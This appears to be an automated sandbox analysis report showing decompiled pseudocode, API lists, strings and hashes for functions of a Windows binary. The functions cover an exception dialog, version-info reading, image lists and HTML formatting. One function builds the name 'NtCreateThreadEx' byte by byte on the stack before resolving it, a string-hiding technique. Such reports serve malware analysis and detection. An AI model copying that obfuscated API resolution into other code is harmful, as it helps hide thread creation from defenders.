                                                                                                                            C-Code - Quality: 45%
                                                                                                                            			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                            0x00408ae3
                                                                                                                            0x00408aeb
                                                                                                                            0x00408af3
                                                                                                                            0x00408b76
                                                                                                                            0x00408b8a
                                                                                                                            0x00408b91
                                                                                                                            0x00408b98
                                                                                                                            0x00408bb1
                                                                                                                            0x00408bb3
                                                                                                                            0x00408bc6
                                                                                                                            0x00408bcc
                                                                                                                            0x00408bda
                                                                                                                            0x00408be0
                                                                                                                            0x00408bf3
                                                                                                                            0x00408bfa
                                                                                                                            0x00408c0b
                                                                                                                            0x00408c12
                                                                                                                            0x00408c17
                                                                                                                            0x00408c1a
                                                                                                                            0x00408c2c
                                                                                                                            0x00408c39
                                                                                                                            0x00408c3d
                                                                                                                            0x00408c3f
                                                                                                                            0x00408c41
                                                                                                                            0x00408c52
                                                                                                                            0x00408c58
                                                                                                                            0x00408c58
                                                                                                                            0x00408c6f
                                                                                                                            0x00408c71
                                                                                                                            0x00408c73
                                                                                                                            0x00408c83
                                                                                                                            0x00408c89
                                                                                                                            0x00408c89
                                                                                                                            0x00408c8a
                                                                                                                            0x00408c8f
                                                                                                                            0x00408c91
                                                                                                                            0x00408c9a
                                                                                                                            0x00408c93
                                                                                                                            0x00408c93
                                                                                                                            0x00408c93
                                                                                                                            0x00408c9f
                                                                                                                            0x00408ca5
                                                                                                                            0x00408caf
                                                                                                                            0x00408cbc
                                                                                                                            0x00408cc2
                                                                                                                            0x00408cc7
                                                                                                                            0x00408ccd
                                                                                                                            0x00408cd0
                                                                                                                            0x00408cd6
                                                                                                                            0x00408cd7
                                                                                                                            0x00408cd8
                                                                                                                            0x00408cde
                                                                                                                            0x00408ce3
                                                                                                                            0x00408ceb
                                                                                                                            0x00408cfe
                                                                                                                            0x00408d03
                                                                                                                            0x00408d06
                                                                                                                            0x00408d0c
                                                                                                                            0x00408d21
                                                                                                                            0x00408d27
                                                                                                                            0x00408d0c
                                                                                                                            0x00000000
                                                                                                                            0x00408ca7
                                                                                                                            0x00408ca7
                                                                                                                            0x00408cad
                                                                                                                            0x00408d28
                                                                                                                            0x00408d2e
                                                                                                                            0x00408d35
                                                                                                                            0x00408d36
                                                                                                                            0x00408d42
                                                                                                                            0x00408d48
                                                                                                                            0x00408d4e
                                                                                                                            0x00408d54
                                                                                                                            0x00408d5a
                                                                                                                            0x00408d60
                                                                                                                            0x00408d66
                                                                                                                            0x00408d6c
                                                                                                                            0x00408d72
                                                                                                                            0x00408d73
                                                                                                                            0x00408d7f
                                                                                                                            0x00408d85
                                                                                                                            0x00408d8a
                                                                                                                            0x00408d8f
                                                                                                                            0x00408d90
                                                                                                                            0x00408da8
                                                                                                                            0x00408db9
                                                                                                                            0x00408dbf
                                                                                                                            0x00408dc5
                                                                                                                            0x00408dc5
                                                                                                                            0x00000000
                                                                                                                            0x00408cad
                                                                                                                            0x00408ca5
                                                                                                                            0x00408af6
                                                                                                                            0x00408afc
                                                                                                                            0x00408b07
                                                                                                                            0x00408b2a
                                                                                                                            0x00408b38
                                                                                                                            0x00408b53
                                                                                                                            0x00408b56
                                                                                                                            0x00408b62
                                                                                                                            0x00408b6a
                                                                                                                            0x00408b6a
                                                                                                                            0x00408b2a
                                                                                                                            0x00408b07
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                            • {Unknown}, xrefs: 00408BA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                            • API String ID: 4111938811-1819279800
                                                                                                                            • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                            • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                            • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                            • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                            0x0040b04d
                                                                                                                            0x0040b05e
                                                                                                                            0x0040b060
                                                                                                                            0x0040b063
                                                                                                                            0x0040b06a
                                                                                                                            0x0040b06d
                                                                                                                            0x0040b076
                                                                                                                            0x0040b07b
                                                                                                                            0x0040b07e
                                                                                                                            0x0040b084
                                                                                                                            0x0040b08e
                                                                                                                            0x0040b0a8
                                                                                                                            0x0040b0aa
                                                                                                                            0x0040b0ad
                                                                                                                            0x0040b0b0
                                                                                                                            0x0040b0b3
                                                                                                                            0x0040b0b6
                                                                                                                            0x0040b0b8
                                                                                                                            0x0040b0bb
                                                                                                                            0x0040b0be
                                                                                                                            0x0040b0c1
                                                                                                                            0x0040b0c4
                                                                                                                            0x0040b0c7
                                                                                                                            0x0040b0ca
                                                                                                                            0x0040b0cd
                                                                                                                            0x0040b0cd
                                                                                                                            0x0040b0e5
                                                                                                                            0x0040b11f
                                                                                                                            0x0040b128
                                                                                                                            0x0040b0e7
                                                                                                                            0x0040b0e7
                                                                                                                            0x0040b0f1
                                                                                                                            0x0040b0f2
                                                                                                                            0x0040b0f3
                                                                                                                            0x0040b0fb
                                                                                                                            0x0040b0fd
                                                                                                                            0x0040b0fe
                                                                                                                            0x0040b11d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040b11d
                                                                                                                            0x0040b13c
                                                                                                                            0x0040b151
                                                                                                                            0x0040b166
                                                                                                                            0x0040b17b
                                                                                                                            0x0040b190
                                                                                                                            0x0040b1a5
                                                                                                                            0x0040b1ba
                                                                                                                            0x0040b1cf
                                                                                                                            0x0040b1d6
                                                                                                                            0x0040b1d7
                                                                                                                            0x0040b1d8
                                                                                                                            0x0040b1de
                                                                                                                            0x0040b1e3

                                                                                                                            APIs
                                                                                                                            • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                            • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                            • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                            • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                            • wcscpy.MSVCRT ref: 0040B128
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                            • API String ID: 1223191525-1542517562
                                                                                                                            • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                            • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                            • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                            • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 76%
                                                                                                                            			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                            0x0040a1f8
                                                                                                                            0x0040a26d
                                                                                                                            0x00000000
                                                                                                                            0x0040a26f
                                                                                                                            0x0040a205
                                                                                                                            0x0040a20b
                                                                                                                            0x0040a20d
                                                                                                                            0x0040a213
                                                                                                                            0x0040a214
                                                                                                                            0x0040a215
                                                                                                                            0x0040a216
                                                                                                                            0x0040a217
                                                                                                                            0x0040a219
                                                                                                                            0x0040a21f
                                                                                                                            0x0040a223
                                                                                                                            0x0040a227
                                                                                                                            0x0040a22b
                                                                                                                            0x0040a22f
                                                                                                                            0x0040a233
                                                                                                                            0x0040a237
                                                                                                                            0x0040a23b
                                                                                                                            0x0040a23f
                                                                                                                            0x0040a243
                                                                                                                            0x0040a247
                                                                                                                            0x0040a24b
                                                                                                                            0x0040a24f
                                                                                                                            0x0040a253
                                                                                                                            0x0040a257
                                                                                                                            0x0040a25b
                                                                                                                            0x0040a25f
                                                                                                                            0x0040a269
                                                                                                                            0x00000000
                                                                                                                            0x0040a26c
                                                                                                                            0x0040a271

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                            • API String ID: 2574300362-1257427173
                                                                                                                            • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                            • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                            • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                            • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 63%
                                                                                                                            			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                            0x00407f9b
                                                                                                                            0x00407fa3
                                                                                                                            0x00407fad
                                                                                                                            0x00407fb9
                                                                                                                            0x0040802e
                                                                                                                            0x00408032
                                                                                                                            0x00408038
                                                                                                                            0x0040803e
                                                                                                                            0x00407fbb
                                                                                                                            0x00407fc9
                                                                                                                            0x00407fd0
                                                                                                                            0x00407fe0
                                                                                                                            0x00407fe5
                                                                                                                            0x00407ff7
                                                                                                                            0x00408015
                                                                                                                            0x0040801b
                                                                                                                            0x00408021
                                                                                                                            0x00408021
                                                                                                                            0x00408051
                                                                                                                            0x00408051
                                                                                                                            0x00408059
                                                                                                                            0x00408065
                                                                                                                            0x00408069
                                                                                                                            0x0040806f
                                                                                                                            0x00408087
                                                                                                                            0x00408087
                                                                                                                            0x0040809c
                                                                                                                            0x004080bb
                                                                                                                            0x004080d1
                                                                                                                            0x004080de
                                                                                                                            0x004080e2
                                                                                                                            0x004080ea
                                                                                                                            0x004080fb
                                                                                                                            0x00408105
                                                                                                                            0x00408115
                                                                                                                            0x00408121
                                                                                                                            0x00408127
                                                                                                                            0x00408150

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00407FD0
                                                                                                                            • memset.MSVCRT ref: 00407FE5
                                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                            • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                            • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                            • LoadImageW.USER32 ref: 004080B4
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                            • LoadImageW.USER32 ref: 004080D1
                                                                                                                            • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                            • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                            • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                            • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                            • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 304928396-0
                                                                                                                            • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                            • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                            • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                            • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                            0x0040ae90
                                                                                                                            0x0040aeab
                                                                                                                            0x0040aeb2
                                                                                                                            0x0040aec0
                                                                                                                            0x0040aec7
                                                                                                                            0x0040aecc
                                                                                                                            0x0040aed3
                                                                                                                            0x0040aeda
                                                                                                                            0x0040aee1
                                                                                                                            0x0040aee1
                                                                                                                            0x0040aee7
                                                                                                                            0x0040aeea
                                                                                                                            0x0040aeed
                                                                                                                            0x0040aef9
                                                                                                                            0x0040aefe
                                                                                                                            0x0040af05
                                                                                                                            0x0040af07
                                                                                                                            0x0040af08
                                                                                                                            0x0040af13
                                                                                                                            0x0040af18
                                                                                                                            0x0040af19
                                                                                                                            0x0040af26
                                                                                                                            0x0040af2b
                                                                                                                            0x0040af2b
                                                                                                                            0x0040af2e
                                                                                                                            0x0040af34
                                                                                                                            0x0040af43
                                                                                                                            0x0040af44
                                                                                                                            0x0040af4f
                                                                                                                            0x0040af54
                                                                                                                            0x0040af55
                                                                                                                            0x0040af62
                                                                                                                            0x0040af67
                                                                                                                            0x0040af70
                                                                                                                            0x0040af76
                                                                                                                            0x0040af7a
                                                                                                                            0x0040af82
                                                                                                                            0x0040af88
                                                                                                                            0x0040af8d
                                                                                                                            0x0040af97
                                                                                                                            0x0040af9f
                                                                                                                            0x0040afa5
                                                                                                                            0x0040afa9
                                                                                                                            0x0040afb1
                                                                                                                            0x0040afb7
                                                                                                                            0x0040afbd

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
